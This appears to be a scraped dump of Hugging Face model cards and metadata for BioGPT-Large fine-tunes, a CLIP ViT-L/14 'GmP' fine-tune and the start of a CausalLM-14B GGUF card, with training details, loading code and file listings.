""vlad-htg/microsoft-BioGPT-Large"", ""ayub567/medaichatbot"", ""ameykalpe/microsoft-BioGPT-Large"", ""UraniaLi/Energenesis_Biomedical_AI"", ""Yossefahmed68/microsoft-BioGPT-Large"", ""Krystal5299/microsoft-BioGPT-Large"", ""Ashraf/BioGPT_Chat"", ""Nurpeyis/microsoft-BioGPT-Large"", ""0xgokuz/microsoft-BioGPT-Large"", ""K00B404/One-stop-till-you-drop"", ""aidevlab/BioGPT_text_generation"", ""zaikaman/AIDoctor"", ""ihkaraman/medical-chatbot"", ""SeemaSaharan/Diagnosis_Clinical"", ""nroy8/symptom-checker-ai"", ""Ravithreni4/AI-Health-Assistent"", ""Ravithreni4/Health-Assistent"", ""drkareemkamal/pediatric_RAG"", ""S0umya/canceropinion.ai"", ""anaghanagesh/drug_discovery_using_LLMs"", ""anaghanagesh/Drug_Discovery_using_LLMs_"", 
""kseth9852/health_report_analysis""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-02-05 06:18:14+00:00"", ""cardData"": ""datasets:\n- pubmed\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\npipeline_tag: text-generation\ntags:\n- medical\nwidget:\n- text: COVID-19 is\ninference:\n parameters:\n max_new_tokens: 50"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""63dd3396327159311ac515f7"", ""modelId"": ""microsoft/BioGPT-Large"", ""usedStorage"": 12569856117}",0,"https://huggingface.co/RobCzikkel/DoctorGPT, https://huggingface.co/Shaheer14326/Fine_tunned_Biogpt",2,,0,,0,,0,"MMYang/microsoft-BioGPT-Large, MohammedAlakhras/ChatDoctor, RamboRogers/BioGPT, Sharathhebbar24/One-stop-for-Open-source-models, anaghanagesh/Drug_Discovery_using_LLMs_, anaghanagesh/drug_discovery_using_LLMs, flash64/biogpt-testing, huggingface/InferenceSupport/discussions/1109, kadirnar/Whisper_M2M100_BioGpt, katielink/biogpt-large-demo, katielink/compare-bio-llm, nroy8/symptom-checker-ai, zaikaman/AIDoctor",13
RobCzikkel/DoctorGPT,"---
license: mit
base_model: microsoft/BioGPT-Large
tags:
- generated_from_trainer
model-index:
- name: bioGPT
  results: []
---

<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->

# DoctorGPT

This model is a fine-tuned version of [microsoft/BioGPT-Large](https://huggingface.co/microsoft/BioGPT-Large) on a formatted version of the MedQuad-MedicalQnADataset dataset.
It achieves the following results on the evaluation set:
- Loss: 1.1114

## Model description

The base model is Microsoft's BioGPT; it was fine-tuned with a custom prompt for a conversational chatbot between a patient and a doctor.
The prompt used is as follows:

```py
""""""You are a Doctor. Below is a question from a patient. Write a response to the patient that answers their question\n\n""

### Patient: {question}""

### Doctor: {answer}
""""""
```

## Inference

The fine-tuned model has a saved generation config; to use it:
```py
from transformers import GenerationConfig

generation_config = GenerationConfig.from_pretrained(
    ""RobCzikkel/DoctorGPT""
)
```

This config is a diverse beam search strategy:
```py
diversebeamConfig = GenerationConfig(
    min_length=20,
    max_length=256,
    do_sample=False,
    num_beams=4,
    num_beam_groups=4,
    diversity_penalty=1.0,
    repetition_penalty=3.0,
    eos_token_id=model.config.eos_token_id,
    pad_token_id=model.config.pad_token_id,
    bos_token_id=model.config.bos_token_id,
)
```

For best results, please use this as your generator function:
```py
def generate(query):
    sys = ""You are a Doctor. Below is a question from a patient. Write a response to the patient that answers their question\n\n""
    patient = f""### Patient:\n{query}\n\n""
    doctor = f""### Doctor:\n ""

    prompt = sys + patient + doctor

    inputs = tokenizer(prompt, return_tensors=""pt"").to(""cuda"")
    generated_ids = model.generate(
        **inputs,
        generation_config=generation_config,
    )
    outputs = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
    answer = outputs[0]
    answer = '.'.join(answer.split('.')[:-1])
    torch.cuda.empty_cache()
    return answer + "".""
```

## Intended uses & limitations

This is a private project for fine-tuning a medical language model; it is not intended to be used as a source of medical advice.

## Training and evaluation data

More information needed

## Training procedure

### Training hyperparameters

The following hyperparameters were used during training:
- learning_rate: 0.0005
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 16
- total_train_batch_size: 64
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.03
- num_epochs: 3
- mixed_precision_training: Native AMP

### Training results

| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| No log        | 0.25  | 51   | 1.2418          |
| 1.3267        | 0.5   | 102  | 1.1900          |
| 1.3267        | 0.75  | 153  | 1.1348          |
| 1.1237        | 0.99  | 204  | 1.0887          |
| 1.1237        | 1.24  | 255  | 1.1018          |
| 0.7527        | 1.49  | 306  | 1.0770          |
| 0.7527        | 1.74  | 357  | 1.0464          |
| 0.7281        | 1.99  | 408  | 1.0233          |
| 0.7281        | 2.24  | 459  | 1.1212          |
| 0.4262        | 2.49  | 510  | 1.1177          |
| 0.4262        | 2.73  | 561  | 1.1125          |
| 0.4124        | 2.98  | 612  | 1.1114          |


### Framework versions

- Transformers 4.36.0.dev0
- Pytorch 2.1.0+cu118
- Datasets 2.15.0
- Tokenizers 0.15.0
","{""id"": ""RobCzikkel/DoctorGPT"", ""author"": ""RobCzikkel"", ""sha"": ""19413de7929ec6249358a48b5a8a8aea403a74df"", ""last_modified"": ""2023-12-04 17:49:55+00:00"", ""created_at"": ""2023-11-25 02:40:31+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 17, ""downloads_all_time"": null, ""likes"": 2, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""biogpt"", ""text-generation"", ""generated_from_trainer"", ""base_model:microsoft/BioGPT-Large"", ""base_model:finetune:microsoft/BioGPT-Large"", ""license:mit"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: microsoft/BioGPT-Large\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: bioGPT\n results: []"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": [{""name"": ""bioGPT"", ""results"": []}], ""config"": {""architectures"": [""BioGptForCausalLM""], ""model_type"": ""biogpt"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""sep_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Nov24_21-12-11_87f33704e632/events.out.tfevents.1700860339.87f33704e632.744.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Nov24_21-16-03_87f33704e632/events.out.tfevents.1700860578.87f33704e632.4122.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Nov24_23-16-13_87f33704e632/events.out.tfevents.1700867787.87f33704e632.35427.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""0xgokuz/RobCzikkel-DoctorGPT""], ""safetensors"": {""parameters"": {""F32"": 1571188800}, ""total"": 1571188800}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-12-04 17:49:55+00:00"", ""cardData"": ""base_model: microsoft/BioGPT-Large\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: bioGPT\n results: []"", ""transformersInfo"": {""auto_model"": 
""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65615e9f49f816b798400a06"", ""modelId"": ""RobCzikkel/DoctorGPT"", ""usedStorage"": 6284863196}",1,,0,,0,,0,,0,"0xgokuz/RobCzikkel-DoctorGPT, huggingface/InferenceSupport/discussions/new?title=RobCzikkel/DoctorGPT&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BRobCzikkel%2FDoctorGPT%5D(%2FRobCzikkel%2FDoctorGPT)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
Shaheer14326/Fine_tunned_Biogpt,"---
license: mit
language:
- en
base_model:
- microsoft/BioGPT-Large
---
This is a fine-tuned version of BioGPT that analyzes doctor-patient conversations transcribed with Whisper, labeling each utterance as doctor or patient.","{""id"": ""Shaheer14326/Fine_tunned_Biogpt"", ""author"": ""Shaheer14326"", ""sha"": ""0009f3651d98954a1cad147daf0cdfc90b8c6b87"", ""last_modified"": ""2025-02-25 21:17:52+00:00"", ""created_at"": ""2025-02-25 21:04:24+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""biogpt"", ""en"", ""base_model:microsoft/BioGPT-Large"", ""base_model:finetune:microsoft/BioGPT-Large"", ""license:mit"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- microsoft/BioGPT-Large\nlanguage:\n- en\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BioGptForSequenceClassification""], ""model_type"": ""biogpt"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""sep_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 346765312}, ""total"": 346765312}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-25 21:17:52+00:00"", ""cardData"": ""base_model:\n- microsoft/BioGPT-Large\nlanguage:\n- en\nlicense: mit"", ""transformersInfo"": null, ""_id"": ""67be305890cc736e2f89a8f9"", ""modelId"": ""Shaheer14326/Fine_tunned_Biogpt"", ""usedStorage"": 1387103856}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Shaheer14326/Fine_tunned_Biogpt&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BShaheer14326%2FFine_tunned_Biogpt%5D(%2FShaheer14326%2FFine_tunned_Biogpt)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
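Editor's note: this repo's config lists `BioGptForSequenceClassification`, so the classifier should load through the standard text-classification pipeline. This is a sketch based on that metadata only; the label names are an assumption, since the card does not state them.

```python
# Sketch: load the doctor/patient utterance classifier via transformers.
from transformers import pipeline

classifier = pipeline("text-classification", model="Shaheer14326/Fine_tunned_Biogpt")
print(classifier("What dose of ibuprofen is safe for me to take?"))
```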
BiomedNLP-BiomedBERT-base-uncased-abstract-fulltext_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
The diff for this file is too large to render. See raw diff.
CLIP-GmP-ViT-L-14_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
@@ -0,0 +1,127 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
zer0int/CLIP-GmP-ViT-L-14,"---
license: mit
base_model: openai/clip-vit-large-patch14
datasets:
- SPRIGHT-T2I/spright_coco
---
## A fine-tune of CLIP-L. Original model: [openai/clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14)
- ❤️ this CLIP? [Help feed it](https://ko-fi.com/zer0int) if you can. Besides data, CLIP eats time & expensive electricity of DE. TY! 🤗
- Want to feed it yourself? All code for fine-tuning and much more is on [my GitHub](https://github.com/zer0int).
-----
## Update 23/SEP/2024:
- Huggingface Transformers / Diffusers pipeline now implemented.
- See here for an example script: [Integrating my CLIP-L with Flux.1](https://github.com/zer0int/CLIP-txt2img-diffusers-scripts)
- Otherwise, use as normal / any HF model:
```
from transformers import CLIPModel, CLIPProcessor, CLIPConfig
model_id = ""zer0int/CLIP-GmP-ViT-L-14""
config = CLIPConfig.from_pretrained(model_id)
```
## Update 03/SEP/2024 / edit 05/AUG:

## 👋 Looking for a Text Encoder for Flux.1 (or SD3, SDXL, SD, ...) to replace CLIP-L? 👀
You'll generally want the ""TE-only"" .safetensors:

- 👉 The ""TEXT"" model has superior prompt following, especially for text, but also for other details. [DOWNLOAD](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14/blob/main/ViT-L-14-TEXT-detail-improved-hiT-GmP-TE-only-HF.safetensors)
- 👉 The ""SMOOTH"" model can sometimes** have better details (when there's no text in the image). [DOWNLOAD](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14/blob/main/ViT-L-14-BEST-smooth-GmP-TE-only-HF-format.safetensors)
- The ""GmP"" initial fine-tune is deprecated / inferior to the above models. Still, you can [DOWNLOAD](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14/blob/main/ViT-L-14-GmP-ft-TE-only-HF-format.safetensors) it.

**: The ""TEXT"" model is the best for text. Full stop. But whether the ""SMOOTH"" model is better for your (text-free) scenario than the ""TEXT"" model really depends on the specific prompt. It might also be the case that the ""TEXT"" model leads to images that you prefer over ""SMOOTH""; the only way to know is to experiment with both.



## 🤓👨‍💻 In general (because we're not limited to text-to-image generative AI), I provide four versions / downloads:

- Text encoder only .safetensors.
- Full model .safetensors.
- State_dict pickle.
- Full model pickle (can be used as-is with ""import clip"" -> clip.load() after bypassing SHA checksum verification).

## The TEXT model has a modality gap of 0.80 (OpenAI pre-trained: 0.82).
- Trained with high temperature of 0.1 + tinkering.
- ImageNet/ObjectNet accuracy ~0.91 for both ""SMOOTH"" and ""TEXT"" models (pre-trained: ~0.84).
- The models (this plot = ""TEXT"" model on MSCOCO) are also golden retrievers: 🥰🐕



----
## Update 11/AUG/2024:

New Best-Performing CLIP ViT-L/14 'GmP-smooth' model added (simply download the files named *BEST*!):



Or just create a fine-tune yourself: [https://github.com/zer0int/CLIP-fine-tune](https://github.com/zer0int/CLIP-fine-tune)

How?
- Geometric Parametrization (GmP) (same as before)
- Activation Value manipulation for 'adverb neuron' (same as before)
- NEW: Custom loss function with label smoothing!
- For in-depth details, see my GitHub. 🤗

----

## A fine-tune of OpenAI / CLIP ViT-L/14 that has an unprecedented ImageNet/ObjectNet accuracy of ~0.90 (original pre-trained model / OpenAI's CLIP: ~0.85)**.

Made possible with Geometric Parametrization (GmP):

```

""Normal"" CLIP MLP (multi-layer perceptron):

(mlp): Sequential(
  |-(c_fc): Linear(in_features=1024, out_features=4096, bias=True)
  | (gelu): QuickGELU()
  |-}-(c_proj): Linear(in_features=4096, out_features=1024, bias=True)
  |    |
  |    |-- visual.transformer.resblocks.0.mlp.c_fc.weight
  |    |-- visual.transformer.resblocks.0.mlp.c_fc.bias
  |
  |---- visual.transformer.resblocks.0.mlp.c_proj.weight
  |---- visual.transformer.resblocks.0.mlp.c_proj.bias


GmP CLIP MLP:

Weight decomposition into:
- radial component 'r' as norm of pre-trained weights
- angular component 'theta' as normalized direction
-> preserves weight vectors' directionality and magnitude

(mlp): Sequential(
  |-(c_fc): GeometricLinear()
  | (gelu): QuickGELU()
  |-}-(c_proj): GeometricLinear()
  |    |
  |    |-- visual.transformer.resblocks.0.mlp.c_fc.r
  |    |-- visual.transformer.resblocks.0.mlp.c_fc.theta
  |    |-- visual.transformer.resblocks.0.mlp.c_fc.bias
  |
  |---- visual.transformer.resblocks.0.mlp.c_proj.r
  |---- visual.transformer.resblocks.0.mlp.c_proj.theta
  |---- visual.transformer.resblocks.0.mlp.c_proj.bias

(Same thing for [text] transformer.resblocks)

```



✅ The model / state_dict I am sharing was converted back to .weight after fine-tuning - thus, it can be used in the same manner as any state_dict, e.g. for use with ComfyUI as the SDXL / SD3 Text Encoder! 🤗

- ** For details on training and those numbers / the eval, please see [https://github.com/zer0int/CLIP-fine-tune](https://github.com/zer0int/CLIP-fine-tune)
- -> You can use ""exp-acts-ft-finetune-OpenAI-CLIP-ViT-L-14-GmP-manipulate-neurons.py"" to replicate my exact model fine-tune.

Pre-trained CLIP model by OpenAI, License: [MIT License](https://github.com/openai/CLIP/blob/main/LICENSE)","{""id"": ""zer0int/CLIP-GmP-ViT-L-14"", ""author"": ""zer0int"", ""sha"": ""3cf34636aee1879dc26f0df1548bbad9cd8a5e24"", ""last_modified"": ""2024-09-23 18:00:45+00:00"", ""created_at"": ""2024-06-15 12:47:19+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 5879, ""downloads_all_time"": null, ""likes"": 430, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""clip"", ""zero-shot-image-classification"", ""dataset:SPRIGHT-T2I/spright_coco"", ""base_model:openai/clip-vit-large-patch14"", ""base_model:finetune:openai/clip-vit-large-patch14"", ""license:mit"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""zero-shot-image-classification"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: openai/clip-vit-large-patch14\ndatasets:\n- SPRIGHT-T2I/spright_coco\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""CLIPModel""], ""model_type"": ""clip"", ""tokenizer_config"": {""unk_token"": {""content"": ""<|endoftext|>"", ""single_word"": false, ""lstrip"": false, ""rstrip"": false, ""normalized"": true, ""__type"": ""AddedToken""}, ""bos_token"": {""content"": ""<|startoftext|>"", ""single_word"": false, ""lstrip"": false, ""rstrip"": false, ""normalized"": true, ""__type"": ""AddedToken""}, ""eos_token"": {""content"": ""<|endoftext|>"", ""single_word"": false, ""lstrip"": false, ""rstrip"": false, ""normalized"": true, ""__type"": ""AddedToken""}, ""pad_token"": ""<|endoftext|>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForZeroShotImageClassification"", ""custom_class"": null, ""pipeline_tag"": ""zero-shot-image-classification"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-HF-format.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-TE-only-HF-format.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-ft-pickle-OpenAI.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-ft-state_dict.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-BEST-smooth-GmP-ft.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft-TE-only-HF-format.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft-pickle-OpenAI.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft-state_dict.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-GmP-ft.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-HF.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-TE-only-HF.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-pickle-OpenAI.pt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ViT-L-14-TEXT-detail-improved-hiT-GmP-state_dict.pt', size=None, blob_id=None, lfs=None)"", 
""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""AlekseyCalvin/soonfactory"", ""nftnik/Redux"", ""mschetel/zer0int-CLIP-GmP-ViT-L-14"", ""John6666/test_clip"", ""K00B404/InstantStyle_custom""], ""safetensors"": {""parameters"": {""F32"": 427616512}, ""total"": 427616512}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-09-23 18:00:45+00:00"", ""cardData"": ""base_model: openai/clip-vit-large-patch14\ndatasets:\n- SPRIGHT-T2I/spright_coco\nlicense: mit"", ""transformersInfo"": {""auto_model"": ""AutoModelForZeroShotImageClassification"", ""custom_class"": null, ""pipeline_tag"": ""zero-shot-image-classification"", ""processor"": ""AutoProcessor""}, ""_id"": ""666d8d57619769a3c4433d16"", ""modelId"": ""zer0int/CLIP-GmP-ViT-L-14"", ""usedStorage"": 15422984386}",0,https://huggingface.co/skunkworx/CLIP-GmP-ViT-L-14,1,,0,,0,,0,"AlekseyCalvin/soonfactory, John6666/test_clip, K00B404/InstantStyle_custom, huggingface/InferenceSupport/discussions/new?title=zer0int/CLIP-GmP-ViT-L-14&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bzer0int%2FCLIP-GmP-ViT-L-14%5D(%2Fzer0int%2FCLIP-GmP-ViT-L-14)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mschetel/zer0int-CLIP-GmP-ViT-L-14, nftnik/Redux",6
|
| 117 |
+
skunkworx/CLIP-GmP-ViT-L-14,"---
|
| 118 |
+
license: mit
|
| 119 |
+
base_model:
|
| 120 |
+
- zer0int/CLIP-GmP-ViT-L-14
|
| 121 |
+
---
|
| 122 |
+
### CLIP ViT-L/14 finetune
|
| 123 |
+
|
| 124 |
+
This repo contains a copy of the zer0int/CLIP-GmP-ViT-L-14 text encoder. The models in this repo are intended for use in [InvokeAI](https://github.com/invoke-ai/InvokeAI).
|
| 125 |
+
|
| 126 |
+
Contents:
|
| 127 |
+
Copied from [zer0int/CLIP-GmP-ViT-L-14](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14).","{""id"": ""skunkworx/CLIP-GmP-ViT-L-14"", ""author"": ""skunkworx"", ""sha"": ""0c1f8d86e91d8f821ede0848d5dd99c0a3a2735a"", ""last_modified"": ""2024-12-29 17:24:48+00:00"", ""created_at"": ""2024-12-29 17:10:20+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""base_model:zer0int/CLIP-GmP-ViT-L-14"", ""base_model:finetune:zer0int/CLIP-GmP-ViT-L-14"", ""license:mit"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- zer0int/CLIP-GmP-ViT-L-14\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-12-29 17:24:48+00:00"", ""cardData"": ""base_model:\n- zer0int/CLIP-GmP-ViT-L-14\nlicense: mit"", ""transformersInfo"": null, ""_id"": ""6771827c711767cce7841180"", ""modelId"": ""skunkworx/CLIP-GmP-ViT-L-14"", ""usedStorage"": 1710537716}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=skunkworx/CLIP-GmP-ViT-L-14&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bskunkworx%2FCLIP-GmP-ViT-L-14%5D(%2Fskunkworx%2FCLIP-GmP-ViT-L-14)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
CausalLM-14B-GGUF_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,459 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
TheBloke/CausalLM-14B-GGUF,"---
|
| 3 |
+
base_model: CausalLM/14B
|
| 4 |
+
datasets:
|
| 5 |
+
- JosephusCheung/GuanacoDataset
|
| 6 |
+
- Open-Orca/OpenOrca
|
| 7 |
+
- stingning/ultrachat
|
| 8 |
+
- meta-math/MetaMathQA
|
| 9 |
+
- liuhaotian/LLaVA-Instruct-150K
|
| 10 |
+
- jondurbin/airoboros-3.1
|
| 11 |
+
- WizardLM/WizardLM_evol_instruct_V2_196k
|
| 12 |
+
- RyokoAI/ShareGPT52K
|
| 13 |
+
- RyokoAI/Fandom23K
|
| 14 |
+
- milashkaarshif/MoeGirlPedia_wikitext_raw_archive
|
| 15 |
+
- wikipedia
|
| 16 |
+
- wiki_lingua
|
| 17 |
+
- fnlp/moss-003-sft-data
|
| 18 |
+
- garage-bAInd/Open-Platypus
|
| 19 |
+
- LDJnr/Puffin
|
| 20 |
+
- openbmb/llava_zh
|
| 21 |
+
- BAAI/COIG
|
| 22 |
+
- TigerResearch/tigerbot-zhihu-zh-10k
|
| 23 |
+
- liwu/MNBVC
|
| 24 |
+
- teknium/openhermes
|
| 25 |
+
inference: false
|
| 26 |
+
language:
|
| 27 |
+
- en
|
| 28 |
+
- zh
|
| 29 |
+
license: wtfpl
|
| 30 |
+
model_creator: CausalLM
|
| 31 |
+
model_name: CausalLM 14B
|
| 32 |
+
model_type: llama
|
| 33 |
+
pipeline_tag: text-generation
|
| 34 |
+
prompt_template: '<|im_start|>system
|
| 35 |
+
|
| 36 |
+
{system_message}<|im_end|>
|
| 37 |
+
|
| 38 |
+
<|im_start|>user
|
| 39 |
+
|
| 40 |
+
{prompt}<|im_end|>
|
| 41 |
+
|
| 42 |
+
<|im_start|>assistant
|
| 43 |
+
|
| 44 |
+
'
|
| 45 |
+
quantized_by: TheBloke
|
| 46 |
+
tags:
|
| 47 |
+
- llama
|
| 48 |
+
- llama2
|
| 49 |
